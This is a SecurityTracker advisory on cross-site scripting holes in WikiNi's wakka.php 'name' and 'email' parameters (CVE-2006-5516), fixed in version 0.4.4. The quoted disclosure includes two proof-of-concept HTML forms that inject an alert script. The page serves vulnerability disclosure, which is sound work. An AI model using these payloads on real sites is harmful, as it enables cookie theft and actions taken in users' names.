SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   WikiNi Vendors:   wikini.net
WikiNi Input Validation Holes in 'name' and 'email' Parameters Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1017116
SecurityTracker URL:  http://securitytracker.com/id/1017116
CVE Reference:   CVE-2006-5516   (Links to External Site)
Updated:  Jun 2 2008
Original Entry Date:  Oct 25 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 0.4.4
Description:   A vulnerability was reported in WikiNi. A remote user can conduct cross-site scripting attacks.

The 'wakka.php' script does not properly filter HTML code from user-supplied input in the 'name' and 'email' parameters before displaying the input. A remote user can create a specially crafted POST request that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the WikiNi software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The original advisory is available at:

http://zone14.free.fr/advisories/6/

Raphael Huck discovered this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the WikiNi software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fixed version (0.4.4), available at:

http://www.wikini.net/wakka.php?wiki=DownloadWikiNi

Vendor URL:  wikini.net/wakka.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  WikiNi Multiple Cross Site Scripting Vulnerabilities

Hi, I've found 2 XSS vulns in WikiNi. The programmers have been contacted and the vulns addressed in version 0.4.4.

The name parameter of page wakka.php is not properly sanitized:

<html>
<body>

<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">

<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="name" value=">&quot;><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">

</form>

</body>
</html>


The email parameter of page wakka.php is not properly sanitized:

<html>
<body>

<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">

<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="email" value=">&quot;><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">

</form>

</body>
</html>
	

Original advisory: http://zone14.free.fr/advisories/6/

--Raphael HUCK

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC